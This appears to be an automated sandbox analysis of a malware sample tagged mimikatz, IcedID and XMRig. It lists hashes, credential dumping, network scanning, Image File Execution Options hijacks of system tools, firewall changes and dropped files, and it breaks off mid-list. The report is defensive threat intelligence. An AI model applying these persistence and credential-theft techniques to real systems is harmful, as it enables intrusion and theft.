Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2025 00:52
Behavioral task
behavioral1
Sample
2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe
-
Size
8.1MB
-
MD5
432d6fa0376995e0a1085cf915197c32
-
SHA1
376cb8b7894fa8c88e6dcb01894494bfb85d0bed
-
SHA256
a4683d8dd3665d1e04e67d5b40205e1c4c524bcc7e383b30245a1f42db290b8e
-
SHA512
1a42c259adfce1f3d28cfe57f5b3667e0e254e9af054f90b074b6af9868e754c1df0652fc6e1197d7a4fa3bf21e2d613f109757d51cc6ab700104c28f55f722e
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1268 created 2124 1268 pnreyic.exe 38 -
Xmrig family
-
Contacts a large (29991) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2564-178-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-182-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-207-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-220-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-234-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-246-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-266-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-516-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-518-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-520-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-775-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig behavioral2/memory/2564-776-0x00007FF755A00000-0x00007FF755B20000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/3660-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3660-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0009000000023c60-7.dat mimikatz behavioral2/memory/4276-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3588-137-0x00007FF722EF0000-0x00007FF722FDE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts pnreyic.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts pnreyic.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe pnreyic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" pnreyic.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 856 netsh.exe 1408 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 4276 pnreyic.exe 1268 pnreyic.exe 3032 wpcap.exe 1364 ttsqkuccf.exe 3588 vfshost.exe 4056 cntrtrctt.exe 1436 xohudmc.exe 1868 asysoo.exe 2564 zergmt.exe 1552 cntrtrctt.exe 400 cntrtrctt.exe 3672 cntrtrctt.exe 4516 cntrtrctt.exe 4144 pnreyic.exe 4572 cntrtrctt.exe 4440 cntrtrctt.exe 4248 cntrtrctt.exe 3296 cntrtrctt.exe 4712 cntrtrctt.exe 1516 cntrtrctt.exe 5008 cntrtrctt.exe 5088 cntrtrctt.exe 220 cntrtrctt.exe 2976 cntrtrctt.exe 2104 cntrtrctt.exe 3788 cntrtrctt.exe 2088 cntrtrctt.exe 2504 ncgcflyve.exe 448 pnreyic.exe -
Loads dropped DLL 12 IoCs
pid Process 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 3032 wpcap.exe 1364 ttsqkuccf.exe 1364 ttsqkuccf.exe 1364 ttsqkuccf.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 63 ifconfig.me 65 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content pnreyic.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\asysoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F pnreyic.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft pnreyic.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\asysoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 pnreyic.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 pnreyic.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE pnreyic.exe -
resource yara_rule behavioral2/memory/3588-136-0x00007FF722EF0000-0x00007FF722FDE000-memory.dmp upx behavioral2/files/0x0007000000023cbc-135.dat upx behavioral2/memory/3588-137-0x00007FF722EF0000-0x00007FF722FDE000-memory.dmp upx behavioral2/files/0x0007000000023cc7-140.dat upx behavioral2/memory/4056-141-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/4056-143-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/files/0x0007000000023cc5-159.dat upx behavioral2/memory/2564-160-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/1552-168-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/400-174-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-178-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/3672-180-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-182-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/4516-186-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/4572-195-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/4440-200-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/4248-205-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-207-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/3296-211-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/4712-216-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-220-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/1516-222-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/5008-227-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/5088-232-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-234-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/220-238-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2976-244-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-246-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/2104-249-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/3788-252-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2088-255-0x00007FF6BD1C0000-0x00007FF6BD21B000-memory.dmp upx behavioral2/memory/2564-266-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/2564-516-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/2564-518-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/2564-520-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/2564-775-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx behavioral2/memory/2564-776-0x00007FF755A00000-0x00007FF755B20000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nblmptktz\UnattendGC\specials\libeay32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\Corporate\mimidrv.sys pnreyic.exe File created C:\Windows\nblmptktz\upbdrjv\swrpwe.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ttsqkuccf.exe pnreyic.exe File created C:\Windows\hrmeszcf\svschost.xml pnreyic.exe File created C:\Windows\ime\pnreyic.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\wpcap.exe pnreyic.exe File opened for modification C:\Windows\nblmptktz\Corporate\log.txt cmd.exe File created C:\Windows\nblmptktz\UnattendGC\specials\svschost.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\vimpcsvc.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\libxml2.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\posh-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\exma-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.exe pnreyic.exe File created C:\Windows\hrmeszcf\vimpcsvc.xml pnreyic.exe File created C:\Windows\hrmeszcf\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\Corporate\mimilib.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\tibe-2.dll pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\Packet.dll pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\wpcap.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\tucl-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\zlib1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.xml pnreyic.exe File created C:\Windows\hrmeszcf\docmicfg.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\Shellcode.ini pnreyic.exe File opened for modification C:\Windows\hrmeszcf\pnreyic.exe 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\hrmeszcf\docmicfg.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ncgcflyve.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\cnli-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\crli-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\spoolsrv.exe pnreyic.exe File opened for modification C:\Windows\nblmptktz\etgfqftjv\Packet.dll pnreyic.exe File created C:\Windows\nblmptktz\Corporate\vfshost.exe pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\scan.bat pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\vimpcsvc.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\svschost.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\svschost.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\coli-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\schoedcl.xml pnreyic.exe File opened for modification C:\Windows\nblmptktz\etgfqftjv\Result.txt ncgcflyve.exe File created C:\Windows\nblmptktz\UnattendGC\specials\ucl.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\xdvl-0.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\docmicfg.xml pnreyic.exe File created C:\Windows\hrmeszcf\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\AppCapture64.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\ssleay32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\vimpcsvc.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.exe pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\docmicfg.xml pnreyic.exe File opened for modification C:\Windows\hrmeszcf\spoolsrv.xml pnreyic.exe File created C:\Windows\nblmptktz\etgfqftjv\ip.txt pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\trch-1.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\specials\trfo-2.dll pnreyic.exe File created C:\Windows\hrmeszcf\pnreyic.exe 2025-01-16_432d6fa0376995e0a1085cf915197c32_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\hrmeszcf\schoedcl.xml pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\AppCapture32.dll pnreyic.exe File created C:\Windows\nblmptktz\UnattendGC\spoolsrv.xml pnreyic.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2396 sc.exe 2504 sc.exe 180 sc.exe 2796 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pnreyic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 